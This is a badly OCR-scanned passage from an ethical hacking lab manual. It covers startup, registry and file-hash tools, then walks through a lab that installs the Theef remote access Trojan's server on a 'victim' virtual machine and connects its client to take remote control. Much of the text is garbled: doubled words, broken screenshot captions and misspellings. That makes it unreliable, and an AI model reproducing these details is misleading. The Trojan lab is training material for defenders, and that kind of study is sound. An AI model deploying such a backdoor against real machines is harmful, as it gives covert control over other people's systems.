H Compare Compare the current Autoruns display with previous previous results results that you'v you'vee saved. Select File | Compare and browse to die saved file. Autoruns will display display in green any new items, which correspond to entries that are not present in the saved file. file. Note that i t does not show deleted items

FJe or directory X : Fie or directory 'C:

FJe or directo ry X : 26 6

13 Registry junk

V

Selected: Selected: 0, highlighte d: 0, total: 296

FIGURE 8.23: jvl6 Clean and fix my compute! Items.

24. The Registry junk section provides details for selected items. 1- jv16 PowerTools 2012 2012 [W8 x64]~ Clean and fix my computer! File

[ J If you are running running Autoruns without administrative privileges privileges on Windows Vista and attempt to change die state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights

Select

Tools

*

Help

Item Severity Description Tags Item _] 3 3

/

Severity

Description

Tags

Re gi str y ju nk

26 6

O b s o le te s o ft w a re e n try

4

□

HKCUVSoftw

30%

Obsolete software e

□

H KC KC U^ Uô ftftw

3 0%

Obsolete so so ft w a re {

□

HKUS\S-1-S-

30%

Obsolete so ft w a re

□

H KU KU SV SV 11-5 -

30%

Obsolete software e

□

( 3 U s e l e s s e m p ty k e y

□

HKCRVaaot |

10%

Useless e mpty key

1 46

□

H KC KC RV RV aa aa ot ot

2 0%

Useless e mpty key

□

HKCRVacrot

2 0%

Useless e mpty key

MK MKCRV.aaot

2 0%

Useless em otv kev

Selected: Selected: 0, highlighted : 0, total: 296

FIGURE 8.25: jvl6 Clean and fix my computer Item registry junk.

25. Select all all check boxes 111 die item list and click click Delete. A dialog box appears. appears. Click Yes.

L&S f c s l i l f i f l Page Emp ty Loca tions select selection ion in die Options menu is checked Autoruns doesn't show locations with no

—

479



jv16 PowerTools 2012 2012 [W8-x64] - Clean and and fix my co mpu ter[ File Select Tools Help Item Seventy Description Tags Item

Seventy

0 J

Tags

jv16 PowerTools 2012

O

0

Descnption

You are about to delete a lot of erroneous registry data. Using the Fix option is always w ays the better option. Are you sure sure you kn ow wh at you are doing and w ant to proceed? proceed?

*I S l a i l m e n u a nd nd d e s k t o p i te te m s

23/23

Selectedj29^highlightedfttotah296

FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.

Control which programs start 26. 26. G o to the Home tab, and click die Control automatically icon.



UJ The Verify Signatures option appears in the Opti ons menu on systems systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine i f image image signatures are valid


FIGURE 8.28: jvl6 Control which program start automatically.

27. 27. Check programs in Startup manager, and th then en you can select select die appropriate appropria te action. action. T Z S

jv16 PowerTools 2012 [W8-x64] - Startup Manager File

Select

Tools

Help Process running Yes

Enabled

C! The Hide Microsoft Ent ries selection selection omits omits images that have been signed by Microsoft if if Verify Signatures is selected and omits images that have Microsoft in their resource's company name field if Verify Verify Signa tures is not selected selected

System System e ntry No

PID

4280

Program

)usched.exe

Threads

4

Filename

C: program Files (x86)VCommon (x86)VCommon 1

Command Ine 'C:\program FJes (x86)\Common

Ba ass e p riri or or itit y

N or or ma ma l

Memory usage

9.12 MB

Loaded from

rt
Page Page file usage usage 2.23 MB MB

Descrption

JavaCTM) JavaCTM) Update SchecUer

File size

246.9 2 KB

Tags Enabled

/

Descrption

Program

Tags 10 —

|l 1F ound software i

I S

■

Yes

)usched.exe

□

Yes

googletalk.exe

Go og og le Ta Ta lk lk

C:program Files

□

Yes

EMP_UO.exe

EPSON USB Dispk C:\Program Files

□

Yes

Reader_s Reader_sl.ex l.exe e

Adobe Adobe Acrobat S| S| C:\progr C:\program am Files Files

□

Yes

AdobeARM .exe Adobe Reader ar 1C: 1C: program Files

□

Yes

1g f x tr tr a y. y. e xe xe

□

Yes

hkcmd.exe

hkcmd Module

□

Yes

1gfxpers. gfxpers.exe exe

pers persis isten tence ce Mod Modi. i. C:\W C:\Wind indows owsfey feyst st

C: p ro ro gr gr am am F ilil es es =

i gf gf x Tr Tr ay ay M od od ul ul e C ::\\ W Wii nd nd ow ow st st e eyy st st C :\ W in d o w s ^y s t

FIGURE 8.29: jvl6 Startup Manager Dialogue.

28. Click die Registry Tools menu men u to view registry registry icons. icons.

f!

File

jv16 PowerTools PowerTools 2012 2012 Language

Tools

Help

I MACECRAFT MACECRAFT >SOFTWARE

B3 Use the Hide Microsoft Entries or Hide Windows Entries in the Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system

Trial Urnta bon bon n Effect - 60 days lef t

$ Registry Tools

System Tools

^

Priv Privac acyy Tool Tools

m Regs try Manager

j8 j8> Regetry Compactor

49

Live Support: Online

L

Handbook Handbook not avaiaWe

m

Registry F^der

Registry Find & Replace

Registry Information

Registry Monitor

Registry Cleaner

Backups

Acton Hstory

IU I

Settin Settings gs

100%

Registry Health

Trial Reminder You are using the free trial version o f jvl 6 PowerTools. Pick here to buy the real version'

FIGURE 8.30: jvl6 Registry tools.

29. Click File Tools to view hie icons. CEH Lab Manual Page 48 481



EE1 The H ide Windows Entries omits images signed by Windows Windows if Verify Signat ures is selected. selected. If Verify Signatures is not selected, Hide Windows Ent ries omits image imagess that have Microsoft in their resource's company name field and the image resides beneath the %System %SystemRoot% Root% directory

FIGURE 8.31: jvl6 File tools.

30. Click System Tools ro view system icons. x

jv16 Powe PowerT rToo ools ls 201 2012 2 Fite

Language

Tools

Help

I MACECRAFT ' SOFTWA RE

Home

Registry Tools

! Im■!

^

Trial Untatoon In Effect - 60 days left

U EH

Software Unnsta ler

Startup Manager Manager

Service Manager

System Optimizer


L

Handbook Handbook not avaiaWe

Qj Start Menu Tool

Automation Automation Tool

System Tools

Priv Privac acyy Tool Tools

Backups

Action History IQ I

Setti Setting ngss

100% Registry Health

& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans § a < & d 9 f l » Page 482

Trial Reminder You are using the free trial version version of jvl 6 PowerTools PowerTools.. ClioClioreal version!

to buy the

FIGURE 8.32: jvl6 System tools.



31. Click Privacy Privacy tools to view privacy icon. jv16 Powe PowerTo rTools ols 201 2012 2 I E*e

!,*"Q uage

1001* 1001*

Hdp

1MACECRAFT ' SOFTWARE

A

Regi Regist stry ry Tools

1^

Fie Tools

B

Syste ystem m Tools

Trial Lfnitabon in Effect - 60 days left

his tory Oeaner

L


Handbook not avarfable

Disk Wiper

Backups Actjon Hstory Settings

|Llj

3

Trial Reminder Reminder You are usng the free trial version of jv 16 PowerTools. Ckk here to buy the real version

FIGURE 8.33: jvl6 Privacy tools.

32. Click Backups in die menu to display die Backup Tool dialog box. xT T ^ T eT

jv16 PowerTools PowerTools 2012 2012

£Q You can compare the current Autoruns display with previous results that you've saved. Select File|Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted deleted items

File

Language

loots

Help

MACECRAFT

O £He

SOFTWARE

Trial Umitabon Umitabon in Effect - 60 days lef t

Live Support:

jv16 PowerTools PowerTools 2012 2012 [W8 x64] Backup Tool I ~ I Select Select

Registry Backups Descnptjon

lo ok

L

Handbook not

x

1

Help

Fie Backups

Type

Othef Backups Size

ID

Created

0 13 File File Backups Backups □

Clean e an and and Data Data remo remove ved d 34.6 34.6 KB

0006 00062D 2D

21.09 21.09.20 .2012 12,,

Re Sejected^îighliqhted^ôtaM

■

FIGURE 8.3 8.34: 4: jvl6 Backup took




33. Go to Windows Server 2012 Virtual Machine. =

TASK

5

FsumFrontEnd

34. Double-click FsumFrontEnd.exe, the executable tile located at D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.

35. The Fsum Frontend main window is shown 111 the following following screenshot iz r^ *

Fsum Fronte nd v l .5.5. .5.5.1 1

ESS

B -Q Fsu m Fro nten nten d Tools □ ₪ B -Q C Cal alcu cu late late hash hash e

n Meth o d s (96 (96 ) ad lcrS lcrS

5E = : : Tod 23 - :

■

Verify Verify checksu r 3& : *Generate chec Options 0 5 ! • About

Q adler32

Q ad lcr1 lcr1 5

cfcsum_mp€c2 cfcsum_mp€c2 Q crc8

■

□

c r cl cl 6_ 6_ xr xr >dem >dem □

i

c1 c3 c3 2 __mp mp cg cg 2

n d F32 F32

f l crc16

crcl6 crcl6_zm _zmod odem em □

1 icrc.5 icrc.544

crcM crcM O crc64 crc64 _ ecma ecma

(_ (_)) fletch fletch er8

Q fletch fletch erl 6

ap hash

C b ddkk r

n crc1 crc1 6 _ ccit ccittt

HI crc16_ibm

□

□ c rc rc JZ JZ

IZ crc32_br1p2 crc32_br1p2

d crc32ja crc32jamcrc mcrc

( j d jb h ash as h Q. fletcher32

d d hho o Z35 Z35

CfnvO-22

(7 edonkcy

L

f

n

1

/

Compare

Hath:

lSa.Ua

Encoding:

Bate 16 16 (hexadecimal)

C C?Lo ?Lo g

2 ,

Websits htipi.'/fsumfesourcefoi

& CEH-To CEH-Tools ols are also located mapped Network Drive (Z:) of Virtual Machines

FIGURE 8.35: FsumFrontEnd main window.

36. Select the type ot o t hash th at you want; let’ let’ss say md5. Check C heck die md5 check box. Fsum Front end v1 .5.5. .5.5.1 1 _ Fsum Fron tend ■j □

T oo oo l* l*

I H-I Calculatehaiht latehaiht &>*

Tort

10 Verify Verify checksur ! G en en er era !• !• c h* h* c e ; 8 8 O p titi o ns ns

_____ . . . % m. . _ _____

.........

(_J haval224 (3)

u b*val224 b*val224 (4)

u haval224 (5)

Lh o v al2 5 6 (3 )

□ / w ch ch

Q j i hJ hJ K h

□ m dl

Cl «nd4

(✓md*.|

□ p a na na n ui ui

D p j w r3 2

n ri p « m d l2 8

T 1 rlpemd rlpemd lf lfttO O

□

C ri p e m d 3 2 0

C

0 s db db m

f l sh aO aO

D >h« >h« 1

□ »ha2 (224)

C > h a 2 ((22 5566 )

C 3 h « 2 ((33 8844 )

1 1 * 1 2 ((55 1 2 )

n s i:i: c6 c6 4

f 1sncfru2128(41 1sncfru2128(41

T 1snefm2 1snefm2 128 128 (8 (811

r

r i p e m d2 d2 5 0

hava 1256(4) 1256(4)

l_ h » v jl2 5 6 (5 )

sn efru efru 2 2 5 6 W r

hash

=

sn efru efru 2 22S6 S6 f8> f8>

v

4 -- | A b ou ou t Mash:

\m

Fi e

^ Co

^ 0 a | Uk Q

Encoding: | Base 16 (hexadecimal) v

□ hwac

[
Web titt h ttp :.'/fsu :.'/fsu r>» r>» eto j <«ror 3 en e! I



0-64


FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a tile tile by clicking die File browse brow se b ottom ot tom from die desktop. That Th at is Test.txt. Fsum Frontcnd v1.5.5.1 Fsum Frortend Q T oo oo ls ls L2 Calculate- 0

j-c5 He

□ M e t ho ho d s ( 1 / 9 6 ) »1 1

:

Q Have Autoruns Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu

S 3 Verify Verify chccksur ■•: Geaerare check gH Options

□ h av al2 al2 24 24 (J (J))

□ h ava!2 ava!222 4 (4 (4))

□ haval224 aval224 (S) (S)

Ch av al2 5 6 (3 )

|

□ / ha ha sh sh

□ j sh sh a sh sh

□ m d? d?

G m d4 d4

B m d5 d5

□

□

risdbm

□ ripcmd ripcmd 1 28 28

G ripemd ripemd l&O

E" 1ipemd256

E " r ip ip c m d3 d3 2 0

I

i s h a sh sh

(~1 shaO

Qshal

□ sh a2 (2 (222 44))

Q sha sha2 2 (256) (256)

□

sha2(3 sha2(3&4) &4)

n« ka 2 C CS S11 22II

(- I (17664

IH snefru2 128(4) I 1snefru2 1snefru2 128 (8) I

p j"j" 3 2

hava!2S6 (4)

Q] hav3 2S0 (5)

snefru2 256 14) I

p M wr wr ?

snefru2 256 (1

J?| About :■ Hash: Fie

|

=3 B ,

Encoding: |Base 16 [hexadecimal)

vj

O HMAC HMAC

Wlog

Website httpr.'/fiumfesoircerorge-ne:

FIGURE 8.37: FsumFrontEnd file browse.

& Autor Autoruns uns displays the text "(Not verified)" next to the company name of an image that either either doe s not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system

B--EZ Fsum Ficntcnd a - S T oo ool s : b -ZH C Cal alcu cu late late h ash ash es ;-•G3 Fie :-23 Tec jQ V» rify chK h 1 AJ Genera te ch«< ch«<

□ Methods :96( idler? D(bu1r.mpcg2

Hladlerl6

□ adler32 adler32

n ap has hashh

[H«c8

□ c rc rc 16 16

□ ac1 6 _cci _ccitt tt

| | bdlcr bdlcr crc15_ibm

□ ac15 ac15 _ xx22 5

0 © '•

:1

Orgenirc ’ ■

Nev» folder

Desk Desk to to p

J| Downleads Recent places Ito arits 3 Do cumen cumen ts ts

A-

Computer Folder

SK

Network System Folder

Muu d r J 1 M Pictures 3

fe

Vid Vid eo eo s

flP Computer Local D«fc (C.)

< r

Google Chiomc Shortcut 2.il KB Test Text Document

— 1—a Lccel Disk D) a

Mot i II j j Firefox Shortcut 1.06 KB

Local Local Disk s k [& [&)

0 byte* Filename: Test

| a !I !IFiles Files r. T

3

Website. http:Vfsumfc.50u ccfcrgc. *ct

FIGURE 8.3 8.38: 8: Fsum Front End E nd fileopen.

38. Click Add Folder to select a folder to be added to die hash, for example, D:\CEH-Tools




Fsum front end v1.5.5.1

—I

x

B--IS Fsum Frontend i) □

T oo oo ls ls|

i 1- 1 ■I

C a lc lc u la la t e h as as ht ht J “ !•••^Tort 3

Methods a / 95: (J haval224 haval224 (J)

[ J h«val224 h«val224 (4)

Uhav al224(5 )

U haval258 haval258 (3)

L havat25&( havat25&(4) 4)

H

Q J h JKh JKh

□

L

E

n ri p« m dl 28

Mr lpe m dlf tO

P ripem d256

□ ripe md3 20

C is h a sh

□»haO

□>hd1

□ » hhaa 2 ( 22 22 44))

Csha2(2S 6)

(I 384) 2«« )

K

Verif Verify y check check su r pj* 32 jk Gener ate chec k ! □ » d bm bm 8ij Options 1 s k a2 a2 (5 (5 1 2) 2) About Cowpare

si:c€4 si:c€4

md S

1 1sncfru2123 (4) I

snefw2 128 (8 (811

*^

Ch«v al258 (5) L p a ru ru rrrr a

efru 2 2 5 8 (41 T sn ef 1 u 2 2 5588 ff88> V sn efru

v

Hash: Fie ^

G fl Autoiuns prefixes the

l)ACEH-T0cls\CEHv3 Module 06 Trojans and BackdoorsN BackdoorsNFiles Files and Folder Integrity Che dteiV sum fronte nd1.5 | _ . |_ 0 1

E n c o d i n g : |G a s e 16 ( h c x a d c d m a l )

v|

Qj HMAC

File

name of an image's publisher publisher with "(Not "(Not verified)" if it cannot verify a digital signature for die file that's trusted by the system

< 1t e L o J V

=

Webcit• http:7f1umfetoarcaforge.net 1

FIGURE 8.39: FsumFrontEnd Add Folder. Fsum Frontend v1.5.5.1 Fsum ficntend H-b2 Tools I B-t3 Cakuiateh Cakuiatehash ashes es

j I id «t j I

23Tea

"| kMhwfe (1/96 ! | ghj!h3 L 9^- ^ _JhMl1 60(3) Q_hBv9il60(j} □ hav?C24 hav?C24(4)

: Hi Verify Verify checksum checksum (4es (4es Qmd 2 •- £ Gen&ilt checksum fi □ rip«fnd256 fnd256 :••05 Options

Q tav*224 (5 (5))

Cmu

C! fipemdSZQ

Hash File

LI 9** □ havall 60 (5) □ hav8B56 hav8B56G) G) 5jmd5 □ rshash rshash

LlhailfiO □ panama panama [I!sdbm

| |Koval128(4)

I_h«v«n2ac5)

□ h«v«l192 (A)

□ havaH92[S havaH92[S))

Ch«r11224{3J

□ hav8l256 hav8l256 (5) (5)

Qjhash

Cjsh* h

□ ripemd ripemd128 128 [ ! d ia ia l

C ripemd160

U havelVA(3)

□ hava!192(3 hava!192(3)

Dhaval256(4)

□ pjw32 □ shaO H

Browse For Folder

Dt\CB4-T00IACE

_ _

5

Cshi2224)

CheckerSfsumfrontend- 1.5.5.1' cadrnt•jC

1-i “• “*

t• A Administrator A

Computer

t fa Local Disk(CO

«lD lDisk< k
iL £3 A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system

— iL . __ — ___ —

I

|

CW«I 1

FIGURE 8.4 8.40: 0: FsumFrontEnd FsumFront End Adding Folder. Folder.

39. Respective tiles of o f die selected folder fo lder will will be listed 111 a list box.




II

Fsum Fromend vl .5.55.1 .1

14■_2 Ftum fk■>t«nd a U ooi1 : m tJ CakulatohMhtt CakulatohMhtt i : T «! (9J V»1f, che cksum 14c. : G«n«r «' .t c ^ * J au au m f i cJJ Options About

- ! u H

|

□ Maihodb Maihodb <1/ 96( □ h*aH600> h*aH600> □ Krv»LL4 Krv»LL4(4) f~~ltm&? f~~l tm&?

[ »wvaM vaM60 60(4 (4}} ( **•vrfiMlS) ( kmM

[ |haval1G |haval1G0(3) 0(3) |hav.l2S6<3) v ja i d )

[ Ihâl192 Ihâl192 (3 (3)) D H«v«l2S6(4) pa panama

152(4) C hav.11152 □hav.l2S6
Qry«nd2* rf*?(25«

L n p em em d l M 1 4»?(164> 4»?(164>

Q nh i* l*a?(S12)

[julbm f wr(W wr(W

Q 1 b» b» 0 [ _| _| * Qtlu2(2M| mefru2 128(4 8(41 1 I I1nefru2 I1nefru2 128(8) »«rffu?2%W »«rffu? 2%W

1 |h«vaU92(5) r) |h »h | |np*mdl28

I havaC24Q) ~|» K« h r pr
Hath: File

Dt\CB4-Too(>'CEH.3Module 06 T1cyans and BackdooisSFiles and Folder Integrity Che cke\fso rrtfron tend•1.S.S.1Vftadmexa

■_y j a

:3 Fi *

f i LJ

Encoding: Base16(hexadecim (hexadecimal) al)

v]

.

(~HMAC

Fie ^ D:\CrM-IochvThun D:\CrM-IochvThun1tM-db (P0\C Bt-TM lACBt 4 Lab Prere— rere— 0■ D.'.CB+T0c!s\CEH/8 Lab Prere® ®D:\aH-T D:\aH- T 0cl5\CEH-e lab Prerc-

<|

111

0 oc(s\CEH/S Lab Prer e_ TocisxCEH/S lab Prere_ £3 t>\CFH-TocisxC ji j D:\CH4-Tocte\C H4-Tocte\C£!!-(• (•<€Lab Prere_ S t D\CEH D\CEH Tocb\Cil fv6 Lab Prere_ 4J0.\CEH-Toob vCB+^ Lab Prere_ ^D'.CTH-TochSCEH<€ ^D'.CTH-TochSCEH<€ lab Prert— - j[>\C£H-TochvClHv j[>\C£H-TochvClHv6 lab Prere_ | >

-

Log

Wrr \1le \1le Mlpy/ltumfe 1c. .rfc«1jr

FIGURE 8.41: FsumFiontEnd files list.

40. Click Generate Generate ch ecksum files. files. The progress bar shows the progress percentage percen tage comp c omplete lete for the t he hash h ash tiles tiles generated. Fsum Frortend v1.5.5.1 Fium Fiontend a LZ Tools LZ Tools : H 1 Cakuiatehashes

Mrihodk (196 )

]h*al160G)

[ te ,*160:4}

Ted II ( |K^^t224«4» I fep Verifychecksum14es 14es - 11»U : £ Generat Generatee checksum checksumf! _]np«m«£i 6 Options 14a? (256) (256) About

[ havtim (5 (5))

I j 23

r «

I n ppee md md l2£]

I *»2GS4)

□ havall 60 (5) □ h v.l2S6(3)

3 •ndS Qrehsdi

* 02 )512(

H]haval192 )5( )H haval2S6 )4(

r !- - *. ! * dbm

r lsoc6»

□ h av av*1192(4) □ hav«l2S6(S)

□ pjw*2 Q*h»0

C]haval192 [5) I |npemd12 |npemd1288

U*•“1 *•“1

5ncfru2128 5ncfru2128f41 I Isnefru2 Isnefru2 128(8)

□ K* 4122431

0 *»*

^ npr nprmdl mdlfcO fcO [!***2C224J ?nrfru2 256fi

Hash |

File

Q Autoruns will will display a dialog with a button that enables you to re• launch Autoruns with administrative rights

D:\CEH-Tools'C EH.3f .lcd u e 06Trcj ans ard Backdcois'sRIes and Folder Integrity CheckeAfsu mfronte nd-'.5.5 .lMtadm e £ >

13 F |

| E£j E£j y

Enco Encodin ding: Base 16(h (hex exad adec ecim imal al)) ~v] □HMAC □HMAC

Fie th\CB MocHvThum*>vdb (SPD.CtM-Tooh\CtH^ Lab Prere0■ D ‘.CEHT 0cls\CEH/S Lab Prert_ O D:\CtH-TooH\CtH D:\CtH-TooH\CtHve ve Lab PrgrgB 0 .aH-IooH\CIH4 Lab LabPr« Pr« f_ ^ 0:\CfH.Too»5SCfHv« lab Prert_ D\CIH IeeWvC(M/fl lab Prcrc E0 .\C lH- Ieo
FIGURE 8.4 8.42: 2: FsumFiontEnd FsumFion tEnd Generate checksum file files. s.




1

Fsum Frontend *27% Ir

Ku n fantcnd a •1 . Too• Too•* * W C«k C«k uul4 l4l* l*h h Mh Mh ««1 1 1 N ■

ltwH 6O0 ) 4 )2 )2 224 4 ))•• ^

File

) S*

I twval1«>( al1«>(4)

lhavaH60 lhavaH60(5) (5)

[ h* aM92(J)

r * WV4 22 4IS) r [ _ 1* p emd l«

1 h«v#l2 St>

r |4) [ i mi wmi m

_ J« h h

shM? 064)

C vLa .V.

l*w?(S1?)

r

Wfis

<

□ h«v«H92 (4) (4) □ h .v .l 2S6 (S) □ ihnO ihnO Wffru212«(41

|h«val1M fS) n!h«h —|nprmdl2 8 |«h*1 Iinf#ru2 1?8 (8)

h*r«B24 31 Jilh«h liprmdlM W#ru22 KM

&. y.. ,.CtsktopvTtst.UX Encoding: Ba.e 16
O You can also use the -e command-line option to launch initially launch Autoruns with administrative rights

J

iMalhodbtWKt

~}md/ ; (9.J Vwif, Vwif, Lhw.Uun.t4c, -•jj 6«nwj:«th*ckium 1i □ ;••cl ;••clii Op tio tionn * :..j 3 About

I I

1 X

File D:\CEM-1oc :1vThuu bvd b I^D.CfcH-ToctsvCEH/ * Lab Prtf S■ D:\CB+Toc!s\C D:\CB+Toc!s\CB+
nd5 B16B0289... C482F590 4C029WF4C029WFJ40E83IC

53 D'.CfcH-1octs\C£H/S octs\C£H/SLib Preffc_ fc_ 3 DACEH-Toc*s\C&+/* Lab Prcre_ j i, D:\CB4-Tock\C£R.« Lab Lab Prrrr_ D:\CEH-Toc(s\C£Hv 6 L«bPrere— £)DA\CFH-Toc^CFH-eHbPrerc_

007C8321007C8321D22FF2CC... 3B85A 3B85A96A... C783050E7A7741C269A3S127BA6FMA7 | E8ECEDSA... 08*2202-

□ hmac |

-

j- , Log Re mdS: 1 Ex Extcuton:

C:'U»*S\Admi n««rjw<\0 «ktop\Testt«t D41DeCDS»0CKGa13®09OGICFW2r£ (XkOCfcOOCOI

Rc II <1

ft'CEH-Too• ?‘T hunb^. db

1p, llurr i'f lOU'tffcXgF

FIGURE 8.4 8.43: 3: FsumFrontEnd progre progress ss o f hash files. files.

41. Th e followi fo llowing ng is die list of o f 111d5 tiles after comple co mpletion tion..

& CEH-To CEH-Tools ols are also located mapped Network Drive (Z:) of Virtual Machines

FIGURE 8.4 8.44: 4: FsumFrontEnd list of hash files. files.

Lab An alysis alysis Analyze and document the results related to die lab exercise. Give vour opinion on your target’s target’s security security posture postur e and exposure diroug d iroug h public and free information. information.





Questions 1. Scenario: Alice wants to t o use TC P View to keep an eye 011 external connections. However, sometimes there are large numbers of connections with a Remote Address of "localliost:####". These entnes do not tell Alice anything of interest, and the large quantity of entnes caused useful entries entries to be pushed out of view. view. 2. Is there there any way to filte filterr out the the "l oc allio st:# ## #" Remote Address Address entries? 3. Evaluate wh at are the other othe r detail detailss displayed displayed by “autoruns” “auto runs” and an d analyze analyze the working o f autonuis tool. 4. Evaluate the the other options of Jv l6 Power Powe r Too l and analyz analyzee the result. result. 5. Evaluate Evaluate and list list die algonduns diat Fsu mF rontEn d supports. supports. Internet Connection R equired □

Y es

0 No

Platform Supported 0 C la l a ss ss rroo o m


0 iL ab s

Etliical Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


Crea Creating a Server Using Using the th e Theef Th eef Tbeef is a Windon Windon •s-base •s-based d applicatio application n for bo both the client and and server end. The The The Theef ef server server is a vims vims that that yon yon install install onyonr victim's victim's com compu pute ter, r, and the T h e f client client in in nhatyou then use to control the vims. ICON

KEY

/' Valuable information S

Test your ______ ___ _ knowledge ____

*

Web exerc exercise ise

£Q! Workbook Wo rkbook review

Lab Scenario A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-ofservice (DDoS) attacks, 01 it may be used to install additional Trojans or other forms of malicious software. For example, a backdoor Trojan may be used to install a downloader 01 dropper Trojan, which may 111 turn install a proxy Trojan used to relay spam or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the affected system and thus potentially lead to further compromise by other attackers. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, stealing valuable data from the network, and identity theft.

Lab Objectives The objective of tins lab lab iiss to help students learn to detect Trojan and backdo or attacks. JT Tools Tools demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors

The objectives of the lab niclude: ■


■


■

Attacking a netw ork usmg sample Trojan s and docum enting all all vulnerabilities and flaws detected

Lab Environment To carry tins tins out, you need: need:


Theef tool located at D:\CEH-T00 ls\CEHv 8 Module 06 Trojans and Backdoors\Trojans Typ es\Rem ote A cc es s Trojans (RAT) (RAT)\Th \Thee eef f



■

A com puter running Windows Server Server 2012 as host hos t machine

■

A compu ter running Window Server 8 Virtual Machine (Attacker) Machin e (Victim) (Victim) Windows Server 200 8 mnning 111 Virtual Machine

■

A web brow ser with Internet access

■

Administrative Admin istrative privileges privileges to ru runn tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as mining die file allocation table on a hard drive. Note: The versions of die created client or host and appearance of die website may

differ from what it is 111 die lab, but die actual process of creating the server and die client is same as shown 111 diis lab.

Lab Task Task s M

TASK

1

Create Server with wit h ProRat

1. Launch Laun ch Windows Server 2008 2008 Virtual Virtual Machine and navigate navigate to Z:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote A cc es s Trojans (RAT (RAT)\ )\The Theef. ef.

2. Double-click Server 2 1 0 .exe to run die Trojan on the victim’s machine. j i j a * T ojans T/oes » denot e Ac:e5s roiars (RAT) » Theef

L ° *° I» I Date modi-i modi-ied ed

I-I Type Type

M S ir ir e

H

I 0 . COOararr.n

Ctontt10.**• Edacrvcr

I j

ciders

210

e>e

pass s rea dn-e .txt

v P|B9B9E P|B9B9EBB BB

1 !■3upx.exe Cemnond Shell ~rw * I ^

JA Defacenent 'rojars ^

Destruave T'co T'coans ans

| . Ebanang Ebanang Trojan Trojanss

Ji E-Mal T ojans FPTrojar £

GUI Trojans Trojans

0

i-rrTFH TPS r )ars

i t ICMP Bcddoor Bcddoor ^ MAC OSX Trojans ^ Proxy Ser\erTrojan: Remote Access “rtge Apocalypse ^

31

Atelie web Rem

k). DarkCorretRAT __ ^

ProRst

Theef

FIGURE 8.1: Windows Server 2008-Theef Folder

3. 11111 the th e Open File - S ecu rity Warning Warning window, click Run, as shown in die following screenshot.




Open File - Security Warning The publish er coul d not not be verified run this software?

Name

I]

Are you sure you want to

...emote Access Access Trojans Trojans (RAT)\Theef\Server210.exe (RAT)\Theef\Server210.exe

Publisher Unknown Publisher Type

Application

From

Z:\CEHv8 Module 06Trojans and Backdoors\Trojan... Run Run

Cancel

This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers publishers you trust. How can I decide what software to run

't

FIGURE FIG URE 8.2 8.2:: Windows Server 2008-SecuiityWarning

4. Launch Windows 8 Virtual Machine and naviga navigate te to Z:\CEHv8 Module 06 Trojans and (RAT)\Theef.

5.

Backdoors\Trojans

Types\Remote

Access

Trojans

Double-click Client210.exe to access the victim macliine remotely.

|P. qTT” qTT” 1 | Home « & •

View

Trcjans Types £

Favorites ■

D es es kktt op op £ D o w n lo lo a d s

^

Theef

Ap p licato r t o o k

Share

Theef

v | (j | | Search Theef

v© fi |

c c i p a r a - n .n .n i

iflj E c'1tser\er21 C.exe pc ss.dl l |

readme,tx: readme, tx: "« Scanner.dll Sever2IO.ex6

[1 Documents J ' Music

■ J upx.exe

m

<6 zip.dl zip.dl

P i ct ct ur ur e s

Remote Access Trojans (RAT)

Cl crt2 '0 .ex e j

|

R e c en en t p la la ce ce s

39 Libraries Libraries

Manage

| j V id id eo eo s

Homegroup

f f 1 C o m pu pu t er er tim Local Disk (C:)

V

CEH To T o o ls (\\1 0 .0.0 .0.0..

Net wor k

9 items

1i tem selected S22 KB

FIGURE 8.3: Windows 8-Running Client210.exe

6. 11111 the th e Open File - Se cur ity Warning Warning window, click Run. as shown 111 die following screenshot.




Open File - Security Warning The publisher could not be verified . Are you sure you wan t to run this software?

S3

Name:

. . . p e s \R \R e m o t e A c c e ss ss T r o ja ja n s ( R A T ) \ T h e e f \C \C l i e n t 2 1 0 . e x e

Publisher

U n k n o w n P u b l i s he he r

Type

Application

From:

Z : \ C E H v 8 M o d u l e 0 6 T r o j a n s a n d B a c k do do o rs rs N T ro ro j an an s T .. .. .

Run

Cancel

T h i s f i l e d o e s n o t h a v e a v a l i d d i g i t a l s i g n a t u r e t h a t v e r i f ie ie s i t s publisher. You sh ould only run software from publishers you trust. H o w c a n I d e c id id e w h a t s o f t w a r e t o r u n ?

FIGURE FIGUR E 8.4 8.4:: Windows 8-Security W Warning arning

7. The maui window o f Th eef appears, appears, as shown 111 die following following screenshot. 1^

neetvîu

0

Connect

> Connect

A

Port 6703

FTP

2968

Disconnect

☆

Theef version version 2.10 01/No . ember/2004

FIGURE 8.5 8.5:: Theef Thee f Main Screen Screen

8. Enter En ter an IP address 111 the IP held, and leave die Port and FTP tields as dieir defaults. 9. 111 diis lab we are attacking Windows Server 2008 (10.0.0.13). Click Server 2008. 2008. Connect after entering die IP address o f Window s Server




TT 7Tieef v2 10 Connect

Port

Connect

6703

FTP 2968

Disconnect

A Computer information information

FIGURE 8.6 8.6:: Theef The ef Connecting to Victim Machine Machine

10 10.. N ow ill Windows 8 you have access to view the Windows Server 2008 machine remotely. ro

- h e e fv fv . 2 .1 .1 0

Connect

10.0.0.13

-

Connect

